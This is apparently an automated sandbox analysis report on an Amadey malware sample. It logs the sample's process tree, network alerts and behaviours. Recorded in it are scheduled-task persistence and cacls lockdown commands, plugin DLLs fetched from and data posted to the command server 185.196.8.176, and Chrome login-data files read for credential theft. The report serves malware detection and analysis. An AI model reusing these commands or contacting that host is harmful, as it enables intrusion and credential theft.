Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 31, 2023, 5:42 p.m.	Oct. 31, 2023, 5:44 p.m.

Size	307.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`b6d627dcf04d04889b1f01a14ec12405`
SHA256	`9da10d7b75c589f06f1758ed8e3c0335b9a738d0ad1317c48e380bca768bdddf`
CRC32	`20C054AF`
ssdeep	`6144:G77rhGafhHSBwHRqGJbdbZI44SGe4s8Lu67rvAOveiZavLb:G7rRSSHRnJfIrscu67TZhavL`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check

abd.exe "C:\Users\test22\AppData\Local\Temp\abd.exe"
2556
- Utsysc.exe "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
  2680
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
    2756
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
    2812
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2916
    - cacls.exe CACLS "Utsysc.exe" /P "test22:N"
      2956
    - cacls.exe CACLS "Utsysc.exe" /P "test22:R" /E
      3008
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      3068
    - cacls.exe CACLS "..\ea7c8244c8" /P "test22:N"
      940
    - cacls.exe CACLS "..\ea7c8244c8" /P "test22:R" /E
      2104
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
    2216
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
      2324
      - netsh.exe netsh wlan show profiles
        2584
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main
    2460
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.196.8.176	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49175 -> 185.196.8.176:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 185.196.8.176:80 -> 192.168.56.101:49175	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.8.176:80 -> 192.168.56.101:49175	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 185.196.8.176:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 185.196.8.176:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.101:49173 -> 185.196.8.176:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 31, 2023, 5:42 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 31, 2023, 5:42 p.m.			0	0
IsDebuggerPresent Oct. 31, 2023, 5:42 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 31, 2023, 5:42 p.m.	buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2023, 5:42 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 31, 2023, 5:42 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 31, 2023, 5:42 p.m.	buffer: r console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 31, 2023, 5:42 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.196.8.176/7jshasdS/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll

Performs some HTTP requests (4 events)

request	POST http://185.196.8.176/7jshasdS/index.php
request	POST http://185.196.8.176/7jshasdS/index.php?scr=1
request	GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
request	GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll

Sends data using the HTTP POST Method (2 events)

request	POST http://185.196.8.176/7jshasdS/index.php
request	POST http://185.196.8.176/7jshasdS/index.php?scr=1

Allocates read-write-execute memory (usually to unpack itself) (15 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 5:43 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003ef0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a02000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75e61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76161000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72cb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c74000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 31, 2023, 5:42 p.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a11000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

Utsysc.exe tried to sleep 216 seconds, actually delayed analysis time by 216 seconds

Steals private information from local Internet browsers (5 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file	C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 31, 2023, 5:42 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe	1	1
ShellExecuteExW Oct. 31, 2023, 5:42 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Oct. 31, 2023, 5:42 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Oct. 31, 2023, 5:42 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Oct. 31, 2023, 5:42 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main filepath: rundll32.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (39 events)

Time & API	Arguments	Status	Return
Process32FirstW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: [System Process] process_identifier: 0	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: System process_identifier: 4	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: smss.exe process_identifier: 224	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: csrss.exe process_identifier: 304	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: wininit.exe process_identifier: 352	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: csrss.exe process_identifier: 360	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: winlogon.exe process_identifier: 400	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: services.exe process_identifier: 444	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: lsass.exe process_identifier: 460	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: lsm.exe process_identifier: 468	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 572	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 652	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 724	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 784	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 832	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: audiodg.exe process_identifier: 900	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 992	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 292	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: spoolsv.exe process_identifier: 324	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 1048	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: srvany.exe process_identifier: 1284	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: KMService.exe process_identifier: 1436	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: conhost.exe process_identifier: 1448	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: taskhost.exe process_identifier: 1600	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: sppsvc.exe process_identifier: 1820	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: svchost.exe process_identifier: 1896	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: dwm.exe process_identifier: 1260	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: explorer.exe process_identifier: 1452	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: pw.exe process_identifier: 988	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: SearchIndexer.exe process_identifier: 1160	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: SearchProtocolHost.exe process_identifier: 936	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: SearchFilterHost.exe process_identifier: 2000	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: mobsync.exe process_identifier: 2288	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: pw.exe process_identifier: 2328	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: taskhost.exe process_identifier: 2380	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: Utsysc.exe process_identifier: 2680	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: rundll32.exe process_identifier: 2216	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: rundll32.exe process_identifier: 2324	1	1
Process32NextW Oct. 31, 2023, 5:42 p.m.	snapshot_handle: 0x000000000000013c process_name: rundll32.exe process_identifier: 2460	1	1

An executable file was downloaded by the process utsysc.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Oct. 31, 2023, 5:42 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¶Õ×tOÕ×tOÕ×tO¿pNÇ×tO¿wNÞ×tO¿qNe×tOºqN×tOºpNÚ×tOºwNÜ×tO¿uNØ×tOÕ×uO×tON¹}NÑ×tON¹tNÔ×tON¹OÔ×tON¹vNÔ×tORichÕ×tOPEd /eð" rêÀ`%Xh%øÐØ¢ MpNà.textÈpr `.rdataº©ªv@@.data@> @À.pdataØ¢Ð¤^@@_RDATA@@.rsrcø@@.reloc @BHì(A¸ H''H [èH JHÄ(éÿÌÌÌHì(A¸ H'H °_ècH LJHÄ(éÏÌÌÌHì(A¸H'H ``è3H JHÄ(éÌÌÌHì(A¸ Hï&H p[èH ÌJHÄ(éoÌÌÌHì(A¸Hç&H à^èÓ~H KHÄ(é?ÌÌÌHì(A¸HÏ&H Yè£~H LKHÄ(éÌÌÌHì(E3ÀH¢H c_èv~H KHÄ(éâÌÌÌÌÌÌHì(E3ÀHrH _èF~H ÏKHÄ(é²ÌÌÌÌÌÌHì(E3ÀHBH £Zè~H LHÄ(éÌÌÌÌÌÌHì(E3ÀHH Xèæ}H OLHÄ(éRÌÌÌÌÌÌHì(A¸Hÿ%H àXè³}H LHÄ(éÌÌÌHì(A¸Hß%H °`è}H ÌLHÄ(éïÌÌÌHì(A¸H¿%H ^èS}H MHÄ(é¿ÌÌÌHì(A¸H%H pWè#}H LMHÄ(éÌÌÌHì(A¸H%H Yèó\|H MHÄ(é_ÌÌÌHì(A¸Ho%H [èÃ\|H ÌMHÄ(é/ÌÌÌHì(A¸HO%H [è\|H NHÄ(éÿÌÌÌHì(A¸H+%H pYèc\|H LNHÄ(éÏÌÌÌHì(A¸H%H @Zè3\|H NHÄ(éÌÌÌHì(A¸Hï$H ð[è\|H ÌNHÄ(éoÌÌÌHì(A¸HÏ$H \èÓ{H OHÄ(é?ÌÌÌHì(A¸LH¯$H ÐXè£{H LOHÄ(éÌÌÌHì(A¸HÏ$H Vès{H OHÄ(éßÌÌÌHì(A¸dH¿$H 0^èC{H ÌOHÄ(é¯ÌÌÌHì(A¸H÷$H \è{H PHÄ(éÌÌÌHì(A¸Hß$H PZèãzH LPHÄ(éOÌÌÌHì(A¸HÏ$H Uè³zH PHÄ(éÌÌÌHì(A¸H¯$H ðZèzH ÌPHÄ(éïÿÌÌÌHì(A¸(H$H `YèSzH QHÄ(é¿ÿÌÌÌHì(A¸H$H \è#zH LQHÄ(éÿÌÌÌHì(A¸Ho$H ^èóyH QHÄ(é_ÿÌÌÌHì(A¸HO$H PZèÃyH ÌQHÄ(é/ÿÌÌÌHì(A¸H/$H À[èyH RHÄ(éÿþÌÌÌHì(A¸H$H WècyH LRHÄ(éÏþÌÌÌHì(A¸,Hÿ#H ÀWè3yH RHÄ(éþÌÌÌHì(A¸Hÿ#H ÐVèyH ÌRHÄ(éoþÌÌÌHì(A¸Hï#H ZèÓxH SHÄ(é?þÌÌÌHì(A¸$HÏ#H ðZè£xH LSHÄ(éþÌÌÌHì(A¸HÇ#H WèsxH SHÄ(éßýÌÌÌHì(A¸H¯#H pRèCxH ÌSHÄ(é¯ýÌÌÌHì(A¸H#H àWèxH THÄ(éýÌÌÌHì(A¸H#H ÐTèãwH LTHÄ(éOýÌÌÌHì(A¸ Ho#H ÀXè³wH THÄ(éýÌÌÌHì(A¸ Hg#H °UèwH ÌTHÄ(éïüÌÌÌHì(A¸Hÿ"H àRèSwH UHÄ(é¿üÌÌÌHì(A¸H/#H Uè#wH LUHÄ(éüÌÌÌHì(A¸H#H @RèóvH UHÄ(é_üÌÌÌHì(A¸H÷"H PYèÃvH ÌUHÄ(é/üÌÌÌHì(A¸LHH @UèvH VHÄ(éÿûÌÌÌHì(A¸H§"H 0UècvH LVHÄ(éÏûÌÌÌHì(A¸dH¯H àUè3vH VHÄ(éûÌÌÌHì(A¸HW"H YèvH ÌVHÄ(éoûÌÌÌHì(A¸H?"H àWèÓuH WHÄ(é?ûÌÌÌHì(A¸H'"H ðTè£uH LWHÄ(éûÌÌÌHì(A¸H"H RèsuH WHÄ(éßúÌÌÌHì(A¸Hß!H ðXèCuH ÌWHÄ(é¯úÌÌÌHì(A¸H·!H TèuH XHÄ(éúÌÌÌHì(A¸H!H pRèãtH LXHÄ(éOúÌÌÌHì(A¸Ho!H Pè³tH XHÄ(éúÌÌÌHì(A¸HO!H NètH ÌXHÄ(éïùÌÌÌHì(A¸H?!H TèStH YHÄ(é¿ùÌÌÌHì(A¸0H!H pWè#tH LYHÄ(éùÌÌÌHì(A¸H'!H `WèósH YHÄ(é_ùÌÌÌHì(A¸H!H ðWèÃsH ÌYHÄ(é/ùÌÌÌ request_handle: 0x00cc000c	1	1	0
